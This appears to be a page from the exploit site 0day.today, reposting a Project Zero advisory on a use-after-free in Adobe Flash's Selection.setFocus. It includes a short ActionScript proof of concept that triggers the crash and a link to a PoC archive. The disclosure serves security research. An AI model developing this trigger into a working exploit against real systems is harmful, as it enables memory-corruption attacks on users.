0day.today - 世界最大的漏洞利用数据库。
![](/img/logo_green.jpg)
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币金币
本站管理员使用官方账号。请谨防诈骗!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Adobe Flash - Selection.setFocus Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841 There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs. A minimal PoC follows: var mc = this.createEmptyMovieClip( "mc", 1); var f = Selection.setFocus; mc.f = f; mc.f({toString : func}); function func(){ mc.removeMovieClip(); // Fix heap here } A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40307.zip # 0day.today [2024-07-02] #